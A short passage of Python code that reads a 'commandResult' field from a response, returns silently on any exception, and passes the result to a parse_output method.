resq.text)['commandResult']
except Exception as e:
return
return self.parse_output(result)